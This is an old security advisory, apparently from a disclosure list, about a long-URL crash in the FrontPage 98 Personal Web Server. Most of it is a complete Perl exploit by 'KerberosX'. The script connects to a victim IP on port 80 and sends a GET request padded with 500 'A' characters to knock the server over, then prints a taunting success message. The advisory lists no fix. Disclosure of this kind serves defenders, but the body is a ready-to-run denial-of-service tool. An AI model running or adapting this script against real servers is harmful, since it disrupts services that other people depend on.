COMMAND

    Personal Web Server

SYSTEMS AFFECTED

    FrontPage Personal Web Server

PROBLEM

    Kerb found following.  This  is a small exploit (written  in perl)
    that takes advantage of the poor URL length handling of  FrontPage
    98's personal web server that  is executed when you open/create  a
    "web".   This  exploit  will  work  on  most  machines with a perl
    interpreter, he coded it (and  tested it, of course) on  Windows95
    machine.

    #!/usr/bin/perl

    print <<__END_OF_HEADER;

    \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#
    \# FrontPage Fuck:                      \#
    \#   A small perl script designed to    \#
    \#   drop FrontPage 3.0.926 which is    \#
    \#   part of FrontPage 98 (3.0.926).    \#
    \#   Coded on a Win95 machine using     \#
    \#   a DOS breed of PERL by KerberosX.  \#
    \#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#

    __END_OF_HEADER


 
    $PF_INET = 2;
    $SOCK_STREAM = 1;

    $port = 80;

    $pattern = "S n C4 x8";

    $this_addr = pack($pattern,$PF_INET,0, 0,0,0,0);

    @victim_bytes = split(/\./,$ARGV[0]);
    $serv_addr = pack($pattern,$PF_INET,$port,@victim_bytes);

    $proto = getprotobyname("tcp");

    socket(SOCK, $PF_INET, $SOCK_STREAM, $proto) ||
    die("Cannot create socket.");

    bind(SOCK, $this_addr)  ||
    die("Can't bind");

    connect(SOCK, $serv_addr) ||
    die("Cannot connect.\n");

    print SOCK "GET /" . "A" x 500 . " HTTP/1.0\n\n";

    print "Well, looks like ya phucked 'em!\n";
    close(SOCK);

SOLUTION

    Nothing yet.